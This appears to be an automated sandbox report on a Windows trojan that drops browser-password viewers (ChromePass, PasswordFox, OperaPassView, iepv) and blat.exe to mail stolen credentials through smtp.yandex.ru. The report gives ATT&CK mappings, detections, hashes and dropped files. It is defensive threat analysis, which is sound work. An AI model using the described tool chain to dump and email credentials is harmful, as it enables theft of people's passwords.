              Source: Yara matchFile source: Process Memory Space: OperaPassView.exe PID: 7972, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts111
              Native API              		1
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		21
              Obfuscated Files or Information              		1
              Input Capture              		2
              File and Directory Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
              Process Injection              		11
              Software Packing              		1
              Credentials In Files              		4
              System Information Discovery              		SMB/Windows Admin Shares1
              Input Capture              		1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS121
              Security Software Discovery              		Distributed Component Object Model2
              Clipboard Data              		11
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion              		LSA Secrets2
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Process Injection              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559606 Sample: 0zu73p2YBu Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 39 yandex.ru 2->39 41 smtp.yandex.ru 2->41 51 Antivirus / Scanner detection for submitted sample 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected Opera Password Stealer 2->55 57 5 other signatures 2->57 9 0zu73p2YBu.exe 9 2->9         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\.exe, PE32 9->29 dropped 69 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 9->69 13          .exe 12 9->13         started        signatures6 process7 file8 31 C:\Users\user\AppData\Local\Temp\...\blat.exe, PE32 13->31 dropped 33 C:\Users\user\AppData\Local\Temp\...\blat.dll, PE32 13->33 dropped 35 C:\Users\user\AppData\...\ChromePass.exe, PE32 13->35 dropped 37 3 other files (none is malicious) 13->37 dropped 16 cmd.exe 2 13->16         started        process9 signatures10 47 Uses ping.exe to sleep 16->47 49 Uses ping.exe to check the status of other devices and networks 16->49 19 iepv.exe 1 16->19         started        22 PasswordFox.exe 1 16->22         started        24 ChromePass.exe 1 16->24         started        26 17 other processes 16->26 process11 dnsIp12 59 Antivirus detection for dropped file 19->59 61 Multi AV Scanner detection for dropped file 19->61 63 Machine Learning detection for dropped file 19->63 65 Contains functionality to steal Internet Explorer form passwords 19->65 67 Tries to harvest and steal browser information (history, passwords, etc) 22->67 43 127.0.0.1 unknown unknown 26->43 45 smtp.yandex.ru 77.88.21.158, 49773, 49794, 49812 YANDEXRU Russian Federation 26->45 signatures13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              0zu73p2YBu.exe100%ReversingLabsWin32.Trojan.Generic
              0zu73p2YBu.exe100%AviraTR/Crypt.XDR.Gen
              0zu73p2YBu.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe100%AviraSPR/PassFox.R
              C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe100%AviraSPR/PSW.Gen
              C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\ .exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe61%ReversingLabsWin32.Hacktool.PasswordFox
              C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe61%ReversingLabsWin32.PUA.PassView
              C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe76%ReversingLabsWin32.Hacktool.PStorRevealer
              C:\Users\user\AppData\Local\Temp\600.tmp\blat.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe71%ReversingLabsWin32.PUA.PassView

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.blat.net/0%Avira URL Cloudsafe
              http://www.blat.net)0%Avira URL Cloudsafe
              http://www.blat.net/V0%Avira URL Cloudsafe
              http://https://.savesignIn0%Avira URL Cloudsafe
              http://www.blat.net)User-Agent:0%Avira URL Cloudsafe
              http://www.blat.net/h0%Avira URL Cloudsafe
              http://www.blat.net0%Avira URL Cloudsafe
              http://www.blat.netX-Mailer:0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              yandex.ru
              		5.255.255.77
              		truefalse
                		high
                smtp.yandex.ru
                		77.88.21.158
                		truefalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.blat.net)blat.exe, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://https://.savesignInOperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nirsoft.net/iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpfalse
                    		high
                    http://www.blat.net/h .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395776689.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480455991.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501598450.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583455609.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674118562.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.blat.netblat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.blat.net/V .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.dll.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.blat.net/ .exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.blat.net)User-Agent: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.blat.netX-Mailer: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    77.88.21.158
                    		smtp.yandex.ruRussian Federation
                    		13238YANDEXRUfalse

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1559606
                    Start date and time:2024-11-20 18:14:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 48s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:31
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:0zu73p2YBu.exe
                    (renamed file extension from none to exe, renamed because original name is a hash value)
                    Original Sample Name:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@46/28@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 147
                    • Number of non-executed functions: 369

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: 0zu73p2YBu.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:15:35API Interceptor3776x Sleep call for process: .exe modified
                    12:15:39API Interceptor87x Sleep call for process: PING.EXE modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    77.88.21.158REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                      DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                        Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                xBneIooWzQjjOOg.exeGet hashmaliciousAgentTeslaBrowse
                                  Justificante_13087.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    ORDER FRANCAP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      smtp.yandex.ruREQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      xBneIooWzQjjOOg.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      Justificante_13087.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      ORDER FRANCAP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 77.88.21.158
                                      yandex.ruUnit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                      • 5.255.255.77
                                      REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                      • 93.158.134.119
                                      DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      https://sites.google.com/view/we2k-/homeGet hashmaliciousUnknownBrowse
                                      • 87.250.250.119
                                      Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                      • 213.180.204.90
                                      http://jobs.sixlfags.comGet hashmaliciousUnknownBrowse
                                      • 87.250.250.119
                                      http://gjchristelsodikobehjsg.taplink.wsGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      • 93.158.134.119
                                      https://gjchristelsodikobehjsg.taplink.ws/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      • 93.158.134.119

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      YANDEXRUUnit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                      • 77.88.21.90
                                      REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                      • 93.158.134.119
                                      DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                      • 77.88.21.158
                                      https://sites.google.com/view/we2k-/homeGet hashmaliciousUnknownBrowse
                                      • 87.250.250.119
                                      Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                      • 213.180.204.90
                                      SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exeGet hashmaliciousUnknownBrowse
                                      • 213.180.193.14
                                      SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exeGet hashmaliciousUnknownBrowse
                                      • 213.180.204.196
                                      http://jobs.sixlfags.comGet hashmaliciousUnknownBrowse
                                      • 87.250.251.119

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\ .exe

                                      Download File
                                      Process:C:\Users\user\Desktop\0zu73p2YBu.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):565760
                                      Entropy (8bit):7.907034199129241
                                      Encrypted:false
                                      SSDEEP:12288:C6ZBtrIcxL8ZizoPonO/wl7qA+Jlc2WacJohebJoSkJnkD1kdcQjtt:C6ZB/xLk/07qA+JzW6yskudcQjtt
                                      MD5:6867A307FDB19A4B89696F07FBFB1847
                                      SHA1:BB1ABEB88C33739D02DAEC2EEFD599F6DA33CEFF
                                      SHA-256:7D8DF3D56B4A1A412A8F3D234107417F0F48A48F84E84C43E9AA1D038E74E909
                                      SHA-512:D66199739159A428D0DDAF2EE6C783B9B458855128D2CA72CF46D95CDC6F000FA3A0B99A4D99894DD72D382CF8891A8CF8F6BE856B26075713AA1FA0CCE3FCB7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+.I...............2.`...P.......7.......P....@.........................................................................h........P..hH..........................................................................................................UPX0....................................UPX1.....`.......T..................@....rsrc....P...P...L...V..............@...3.03.UPX!......T9.Y.m....G......&......40...s..*..B]h.F.B.x....../G..03..s.P..b.V..Y4+l.....N..]t#.o.W;..$nl1...+....y...[.j..[..a..;.. 5..6...O"...{_../o.&..W..R..`./Ch.l.C./.|....q.r.........-.{.C.q.>..R*d................8..*X4}....!V...DL.I!lF...kp..5...h.5.3....4.8Q...T.....=...Y..%.&~.6...{...r.\.8=.....-.`.ud..G..%...4.40)z._..BA....}.P.frd.y...^ wkxS......u.(.-tp..&.....@..%....1.r*..X..WQ....r...#.mC...@..|;.].T.|...uYm.J......S1..N....'b.%]i..c.J.I'p.CPp...n...q..

                                      C:\Users\user\AppData\Local\Temp\600.tmp\1.jpg

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 600x399, components 3
                                      Category:dropped
                                      Size (bytes):163370
                                      Entropy (8bit):7.9765611413707935
                                      Encrypted:false
                                      SSDEEP:3072:Y42jCDwxUtsKh1rZ6qAee6mKz8+Mx2O0smXbBHRbjzeNdsz0ZkbTZ/OWo46:Y422DIUHTrZ7Axh+MHYBHRDuwJTDv6
                                      MD5:A24BC2D931B9A82E35F99E0B25730397
                                      SHA1:93736853CE4454323C79B25736D42055BB7DCDA4
                                      SHA-256:1C406A29734C76680E1595BE98BE04FFDC45958E9F488A1FD5090A1457F7711F
                                      SHA-512:77C0F2C8D9DC628DBC64F0DB4D4F091348730DA7707928EADDCEDFA1DFCC3E879B8840C1A5F68CA94ECCA19A22C27402D4A4D8ECE54E1900995B839EA2034078
                                      Malicious:false
                                      Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................X...............................................................................................!1..A.Qa".q.....2..B#....R.3$.br%..C..S4D......................!..1A..Qa..q.."...2......BR#.br3...$..C%.4.sD5E............?....%...)L.:.z.<...|...g..>9..<.....8......5.....q.....U.. ..Q.|~J.<|<...P1.."....T.3>@. g.....F9./. .}4.Y..x.9....S.A...... ...8(..B...\.X..) *..2(QUs...D...(H......r...|.X..9....9.7B......_..*g..@...a.5Bg.._..p.9.H...#..T'..A.ZB...I,4.z.c.../...:mi..'@.'.#.=.o.i{......3.1..O..........B.......E^;.........8ia.tu.3..dBg4..P.....S.....'.qq......Djv.a:..).M..6.*q>...K.yy[.;.....D.'..u]i.J.:zJzh....(...d.5....6v..........Sm...;5:c...Z.?.....:.k.si.UU...`.i........8.i.Q.a.;......1.....enhSs=.B.>.s...>$J/;..t.}..mW.8..$.T...jy.p..d....`qdtu..00..]..<!%..x.&.

                                      C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):130048
                                      Entropy (8bit):7.816255678628108
                                      Encrypted:false
                                      SSDEEP:3072:6agzIyK7evSGkFFam+eis+np3Dq/snVXQnm:6agzIyinLORpO/GVX
                                      MD5:CB271441FA19AC163ECF380C8EBB3109
                                      SHA1:2746EC2F9B03C814CB6DCDF98CD34E5581322239
                                      SHA-256:ABCA78E9E323C83DDA09AFBA29A2CD76846871546959541BFF51EB4AFA1AC499
                                      SHA-512:844CA33B863E925E31A077D04ED6D2DABBCEB4A7DE7D35CC23C42E835CB72B4FA28C170FB78B8BFE75BA7FCD47DA6DDFC5894A687C0095F3AD8EE2B80769A603
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 61%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.v...v...v......t......f......|......}...v...Z......u...Q@..w...Q@..m...Q@..w...Q@..w...Richv...................PE..L....M'N..................... ....................@.............................................................................8...................................................................................................................UPX0....................................UPX1................................@....rsrc.... ..........................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

                                      C:\Users\user\AppData\Local\Temp\600.tmp\user-PC_ChromePass.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..

                                      C:\Users\user\AppData\Local\Temp\600.tmp\user-PC_OperaPassView.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..

                                      C:\Users\user\AppData\Local\Temp\600.tmp\user-PC_PasswordFox.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..

                                      C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):40448
                                      Entropy (8bit):7.480459783551601
                                      Encrypted:false
                                      SSDEEP:768:L2ivyslykfdDY/D16P71WO9xyOMEdSv2mtAl4B6FEfP0JtyEECLvxYZqw:ii6q5dE/Kj/5iUJDglqw
                                      MD5:8B4AE559AD7836B27EE9F8F171BE8139
                                      SHA1:C60DDCFC7B3954F4D0D515B1FDAF47C6999E50A4
                                      SHA-256:1130504F6095D2B09FB1AD39323AB9448798B41EB925539E2128160CEC106609
                                      SHA-512:DF13AE1AA3B481D1A819736AF6DBF5FEA5C930A1FE18EA0368A0D2EFBE20334626DD90B42757BF8EF080F229E502C97CD6F5173738BC4967E26A04AEE61C040B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 61%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......JR.U.3...3...3...<...3...<...3.......3.......3...3...2.......3..)....3..)....3..)....3..Rich.3..........................PE..L.....*M..................... ......0`.......p....@.............................................................................p....p..............................................................................................................UPX0....................................UPX1................................@....rsrc.... ...p......................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

                                      C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):39424
                                      Entropy (8bit):7.512783120236899
                                      Encrypted:false
                                      SSDEEP:768:89taRejmNH/Qjvgmj84TOjlRS6StB+PJP66Dh+lBvt1WChyen:82wMfQ1LKLE4y6WpbWChye
                                      MD5:CC84065F23CFC3D980AAD38EFC648DE6
                                      SHA1:C984A4FE5066440C17CE124BC65CC9152803C274
                                      SHA-256:2EB8BE8484421F65BB26FDAE80E2ED2721E2CC8C4996BE73158F46A6BDE57E22
                                      SHA-512:2920D4444F243AEAABCD360F71C794EDDEF1FCB1A5D487F46267F5DFD1BA319115E2FD4E80CEB79BBD51A03981F6ECA079349D90042EC7A2DF4CDA862CB69F01
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 76%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(.y.(.y.(.y...&.*.y...$.8.y...9.+.y...e.#.y.(.x.,.y...`.+.y.....4.y.....).y.....).y.Rich(.y.........................PE..L.....ZM..................... ......Ph.......p....@.............................................................................8....p..............................................................................................................UPX0....................................UPX1.............z..................@....rsrc.... ...p.......~..............@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

                                      C:\Users\user\AppData\Local\Temp\600.tmp\blat.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):6.537396945447993
                                      Encrypted:false
                                      SSDEEP:3072:tN3YqC7ZpufmsbSB0RaZCdLkMzdTv/3qq1iica:tN3Yq4ZpAPeB0fkMzgGHh
                                      MD5:724CAE63522F6E5F7565A3BF4B2A719B
                                      SHA1:18620DBD4357D85918070F669FF4B61755290757
                                      SHA-256:B87814EAF1CD5268E797F1119B58E3FD79381AF3F530BE9A90993198CBCE1779
